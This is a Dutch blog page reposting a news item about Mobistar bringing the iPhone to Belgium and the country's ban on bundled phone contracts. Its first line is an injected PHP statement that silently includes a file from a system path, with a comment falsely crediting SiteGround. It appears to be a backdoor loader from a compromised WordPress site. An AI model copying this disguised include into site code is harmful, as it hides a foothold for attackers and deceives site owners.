@include_once('/var/lib/sec/wp-settings.php'); // Added by SiteGround WordPress management system Mobistar introduceert iPhone in België

The Brand Office

Avatar

Mobistar introduceert iPhone in België

Mobistar lanceert dit jaar de eerste legale iPhone in België. Het is nog onduidelijk of consumenten tegelijkertijd ook een GSM-abonnement moeten afsluiten.

Orange, de gsm-poot van France Télécom, haalde een contract van Apple binnen om de iPhone te commercialiseren in zeven Europese landen, waaronder België. In ons land is Orange aanwezig via het merk Mobistar. De telecommaatschappij laat weten dat Belgen ‘in de loop van dit jaar’ een iPhone kunnen aanschaffen.

Vraag is maar hoeveel het hebbedingetje zal kosten en of het toestel afzonderlijk verkrijgbaar is. “Apple heeft in elk land een overeenkomst gesloten met een telecomoperator die het toestel mag verkopen”, zegt Bart Vandesompele van concurrent Base. “België is het enige land ter wereld waar zo’n koppelverkoop verboden is. Dus ofwel maakt Apple een uitzondering voor ons land, ofwel zoekt het bedrijf een juridisch achterpoortje.”

Er zijn nu al gekraakte buitenlandse toestellen te koop in Belgische winkels. De naar schatting 15.000 ‘illegale’ gebruikers kunnen zelf hun gsm-netwerk kiezen.

Bron: GVA

No Comments, Comment or Ping

Reply to “Mobistar introduceert iPhone in België”

WTF is this place?

A place to waste lots of time on!


Suggestions of the house

Going so soon? May these suggestions be a guide to web enlightenment.